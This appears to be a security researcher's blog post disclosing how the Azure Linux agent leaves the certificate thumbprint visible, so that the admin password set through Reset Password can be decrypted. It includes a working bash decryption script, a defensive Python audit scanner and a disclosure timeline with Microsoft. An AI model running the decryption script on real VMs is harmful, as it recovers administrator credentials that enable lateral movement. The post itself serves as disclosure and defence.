Extract plain-text password from Azure VM Reset Password feature

Reset Password is a common feature that allows you to create or reset a local administrator account on an Azure VM. It is helpful when you have forgotten the account used to log into your VM. An InfoSec person will naturally ask: can such a password be viewed in plain text? In other words, is it technically possible to recover that password?

In this article, I would like to demonstrate how to extract the password that was set through the Reset Password feature.

Again, Reset Password allows you to reset the local administrator account’s password on an Azure VM (both Windows and Linux).

This can be done from the Azure Portal, the command line, or the VM Access extension. When you reset a password, Azure drops a directory on the target VM named Microsoft.OSTCExtensions.VMAccessForLinux-{version}/

If you read this article, you would probably have an idea of what to look for in every VM extension. Unfortunately, Microsoft knew what was wrong, so they redacted the cert thumbprint to ‘prevent‘ you from decoding the cipher.

This redaction is done in /var/lib/waagent/Microsoft.OSTCExtensions.VMAccessForLinux-1.5.11/Utils/handlerutil2.py

However, the redaction does not address the problem as a whole. The Linux Agent does the opposite: it checks and collects extension information (for status reporting purposes) and writes that information to a file named VmSettings.{number}.json or ExtensionConfig.{number}.xml in /var/lib/waagent. Read this file and you will see a funny thing: the protected settings are redacted, but the cert thumbprint is shown.

Now you have everything you need. Run the following code snippet to see what the password was set to.

#!/bin/bash
# This script can be used to decode the VM Access Extension's protected settings when you have the cert thumbprint.
# The agent keeps the certificate/private-key pair as <thumbprint>.crt and <thumbprint>.prv directly in /var/lib/waagent,
# so the paths are made absolute here instead of relying on the current working directory.
set -euo pipefail
waagent_dir="/var/lib/waagent"
cert_thumbprint="B6FD1D26C4447AF220C31BAD935CD1BA38AD9CE4"
setting_file="${waagent_dir}/Microsoft.OSTCExtensions.VMAccessForLinux-1.5.11/config/0.settings"

# protectedSettings is a base64-encoded PKCS#7 (CMS) blob encrypted to the agent's certificate.
jq -r '.runtimeSettings[].handlerSettings.protectedSettings' "$setting_file" \
  | base64 --decode \
  | openssl smime -inform DER -decrypt \
      -recip "${waagent_dir}/${cert_thumbprint}.crt" \
      -inkey "${waagent_dir}/${cert_thumbprint}.prv" \
  | jq .

During my research, I noticed that if I restarted the Azure Linux Agent (systemctl restart waagent), the protectedSettingCertThumbprint was set back to what it was. The reason is that the handlerutil2.py code that does the redaction is only triggered when a call is made to the VM Access Extension (i.e., when you reset a password using the Reset Password feature).

You may also notice that the cert thumbprint used in every extension configuration is the same one, so you could just use that one for the decoding.
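As an added audit check (my own code, not part of the original post or the agent's code base), the following Python script looks for the precondition described above from a defender's side: a status file under the waagent directory that still carries a cert thumbprint for which the matching .prv private key is present on the same host. The file names follow the article; the key name protectedSettingsCertThumbprint (the article writes it without the "s"), the JSON/XML layout of the sample files and the thumbprints other than the one quoted in the article are assumptions constructed for the example.

```python
"""Audit an Azure Linux Agent directory for status files that expose a
protected-settings cert thumbprint next to the matching private key."""
import re
from pathlib import Path

# Matches both JSON ("protectedSettingsCertThumbprint": "...") and XML
# (protectedSettingsCertThumbprint="...") forms; the key name is an assumption.
THUMBPRINT_RE = re.compile(
    r'protectedSettings?CertThumbprint"?\s*[:=]\s*"([0-9A-Fa-f]{40})"'
)


def find_exposed_thumbprints(status_files, private_keys):
    """Scan in-memory file contents for cert thumbprints.

    status_files: {filename: text} of VmSettings.*.json / ExtensionConfig.*.xml
    private_keys: set of upper-case thumbprints that have a <thumbprint>.prv file
    Returns a list of (filename, thumbprint, key_present) tuples.
    """
    findings = []
    for name, text in status_files.items():
        for thumbprint in THUMBPRINT_RE.findall(text):
            thumbprint = thumbprint.upper()
            findings.append((name, thumbprint, thumbprint in private_keys))
    return findings


def audit_waagent_dir(waagent_dir="/var/lib/waagent"):
    """Read the real agent directory (root required) and run the scan."""
    root = Path(waagent_dir)
    private_keys = {p.stem.upper() for p in root.glob("*.prv")}
    status_files = {}
    for pattern in ("VmSettings.*.json", "ExtensionConfig.*.xml"):
        for path in root.glob(pattern):
            status_files[path.name] = path.read_text(errors="replace")
    return find_exposed_thumbprints(status_files, private_keys)


# Constructed sample input: two status files carrying the thumbprint quoted in
# the article (once lower-case, once upper-case) and one older file carrying a
# made-up thumbprint whose private key is not on disk.
SAMPLE_FILES = {
    "VmSettings.3.json": (
        '{"extensionGoalStates": [{"name": "Microsoft.OSTCExtensions.VMAccessForLinux",'
        ' "settings": [{"protectedSettingsCertThumbprint":'
        ' "b6fd1d26c4447af220c31bad935cd1ba38ad9ce4",'
        ' "protectedSettings": "*** REDACTED ***"}]}]}'
    ),
    "ExtensionConfig.2.xml": (
        '<PluginSettings><Plugin name="Microsoft.OSTCExtensions.VMAccessForLinux">'
        '<RuntimeSettings seqNo="0">{"runtimeSettings":[{"handlerSettings":'
        '{"protectedSettingsCertThumbprint":"B6FD1D26C4447AF220C31BAD935CD1BA38AD9CE4",'
        '"protectedSettings":"*** REDACTED ***"}}]}</RuntimeSettings></Plugin></PluginSettings>'
    ),
    "ExtensionConfig.1.xml": (
        '<PluginSettings><Plugin name="Example.Extension">'
        '<RuntimeSettings seqNo="0">{"runtimeSettings":[{"handlerSettings":'
        '{"protectedSettingsCertThumbprint":"0123456789ABCDEF0123456789ABCDEF01234567",'
        '"protectedSettings":"*** REDACTED ***"}}]}</RuntimeSettings></Plugin></PluginSettings>'
    ),
}
SAMPLE_KEYS = {"B6FD1D26C4447AF220C31BAD935CD1BA38AD9CE4"}


def sample_findings():
    """Run the scan over the constructed sample instead of the live directory."""
    return find_exposed_thumbprints(SAMPLE_FILES, SAMPLE_KEYS)


if __name__ == "__main__":
    for name, thumbprint, key_present in sample_findings():
        state = "DECRYPTABLE: private key on host" if key_present else "no matching key"
        print(f"{name}: {thumbprint} ({state})")
```

Run audit_waagent_dir() as root on a VM to check the live /var/lib/waagent; a finding with key_present set to True means the redaction in the extension's own config has been undone by the agent's status files, which is exactly the condition the decoding script above relies on. The scan is deliberately regex-based rather than a strict JSON/XML parse so that it still works if the agent changes the surrounding layout.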

What about Windows?

For a Windows VM, at the time I reported the issue, the extension configuration was written to a blob in a storage account. The full blob URL was stored under InVMArtifactsProfileBlob in an XML file in C:\WindowsAzure\Config

By opening the blob file, I was able to get the extension configuration information.

I was then able to read the password using this script

Conclusion

Although extracting the plain-text password of the local admin on a Linux or Windows VM requires root/administrative privilege, it is still not good to leave this feature vulnerable. That local admin would be used for all other VMs if they are deployed using a template or from a CM solution (e.g., Ansible or Chef). Hence an attacker could compromise one VM and use that local admin’s credentials to access other VMs and move laterally.

Disclosure Timeline

  • December 1, 2021 – Reported to MSRC.
  • December 2, 2021 – Microsoft received the report and investigated.
  • January 26, 2022 – Microsoft closed the case because root/administrative privilege is required to exploit. This doesn’t meet the bar for servicing.
  • January 26, 2022 – Published an article in AzSec.